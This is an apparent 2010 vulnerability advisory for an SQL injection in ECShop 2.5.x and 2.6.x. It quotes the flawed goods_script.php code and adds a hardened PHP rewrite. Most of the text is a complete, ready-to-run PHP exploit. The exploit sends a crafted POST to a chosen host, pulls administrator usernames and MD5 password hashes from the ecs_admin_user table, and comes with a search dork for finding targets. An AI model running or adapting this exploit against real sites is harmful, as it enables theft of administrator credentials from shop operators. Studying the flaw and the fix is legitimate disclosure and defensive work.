ECShop 2.5.x & 2.6.x Injection Vulnerability Analysis

    Published: 2010-07-19
    Author: Ryat
    Affected versions: ECShop 2.5.x & 2.6.x
    Official site: www.ecshop.com
    Description: In ECShop 2.5.x & 2.6.x, goods_script.php never initialises $sql, which leads to an SQL injection vulnerability.

    Affects 2.5.x and 2.6.x; other versions were not tested.

    goods_script.php, line 44:

      if (empty($_GET['type']))
      {
          ...
      }
      elseif ($_GET['type'] == 'collection')
      {
          ...
      }
      $sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);
      $res = $db->query($sql);

    $sql is never initialised before the LIMIT clause is appended to it. With register_globals enabled, an uninitialised variable can be populated straight from the request, so whatever arrives in a parameter named sql becomes the query body. An obvious vulnerability :)
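As an added example (not ECShop's own code), the same control flow as the line-44 fragment with both defects closed: $sql is assigned before anything is appended to it, so a value smuggled in through register_globals is discarded, and an unknown type is rejected instead of falling through to the LIMIT clause. The query bodies and the ecs_goods columns are assumed stand-ins for the parts the original elides with "...".

```php
<?php
// Added example, not ECShop's own code: a hardened version of the
// goods_script.php logic quoted above. Query bodies are assumed.

function build_goods_sql(array $get): ?string
{
    // Always start from an empty string. With register_globals=On an
    // unset $sql could be pre-filled from the request (a GET or POST
    // field named "sql"); an explicit assignment makes that irrelevant.
    $sql = '';

    // Accept only the `type` values the script has a branch for. The
    // original silently falls through for any other value and then
    // appends LIMIT to whatever $sql already held.
    $type = isset($get['type']) ? (string) $get['type'] : '';
    if ($type === '') {
        // assumed query body for the empty($_GET['type']) branch
        $sql = 'SELECT goods_id, goods_name FROM ecs_goods WHERE is_on_sale = 1';
    } elseif ($type === 'collection') {
        // assumed query body for the "collection" branch
        $sql = 'SELECT goods_id, goods_name FROM ecs_goods WHERE is_best = 1';
    } else {
        return null; // unknown type: refuse to build a query at all
    }

    // goods_num was already cast with intval() in the original; keep that
    // and clamp it so a zero or negative value cannot reach the query.
    $limit = !empty($get['goods_num']) ? intval($get['goods_num']) : 10;
    $sql .= ' LIMIT ' . max(1, min($limit, 100));

    return $sql;
}

// Constructed inputs: a valid request, then one carrying an unexpected
// type together with a stray "sql" parameter that must have no effect.
var_dump(build_goods_sql(['type' => 'collection', 'goods_num' => '5']));
var_dump(build_goods_sql(['type' => '1279518000', 'sql' => 'SELECT 1']));
```

The second call returns null rather than a query, which is the behaviour the original fall-through branch lacks.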

    EXP:

      #!/usr/bin/php
      <?php
      print_r('
      +---------------------------------------------------------------------------+
      ECShop <= v2.6.2 SQL by puret_t
      mail: puretotatgmaildotcom
      team: http://bbs.wolvez.org
      dork: "Powered by ECShop"
      +---------------------------------------------------------------------------+
      ');

      /**
       * works with register_globals = On
       */
      if ($argc < 3) {
          print_r('
      +---------------------------------------------------------------------------+
      Usage: php ' . $argv[0] . ' host path
      host:    target server (ip/hostname)
      path:    path to ecshop
      Example:
      php ' . $argv[0] . ' localhost /ecshop/
      +---------------------------------------------------------------------------+
      ');
          exit;
      }

      error_reporting(7);
      ini_set('max_execution_time', 0);

      $host = $argv[1];
      $path = $argv[2];

      $resp = send();
      preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash);

      if ($hash)
          exit("Exploit Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
      else
          exit("Exploit Failed!\n");

      function send()
      {
          global $host, $path;

          $cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x' . bin2hex('all') . ' LIMIT 1#';

          $data  = "POST " . $path . "goods_script.php?type=" . time() . " HTTP/1.1\r\n";
          $data .= "Accept: */*\r\n";
          $data .= "Accept-Language: zh-cn\r\n";
          $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
          $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
          $data .= "Host: $host\r\n";
          $data .= "Content-Length: " . strlen($cmd) . "\r\n";
          $data .= "Connection: Close\r\n\r\n";
          $data .= $cmd;

          $fp = fsockopen($host, 80);
          fputs($fp, $data);

          $resp = '';
          while ($fp && !feof($fp))
              $resp .= fread($fp, 1024);

          return $resp;
      }
      ?>

Tags: SQL injection, website vulnerability, 0day, script vulnerability
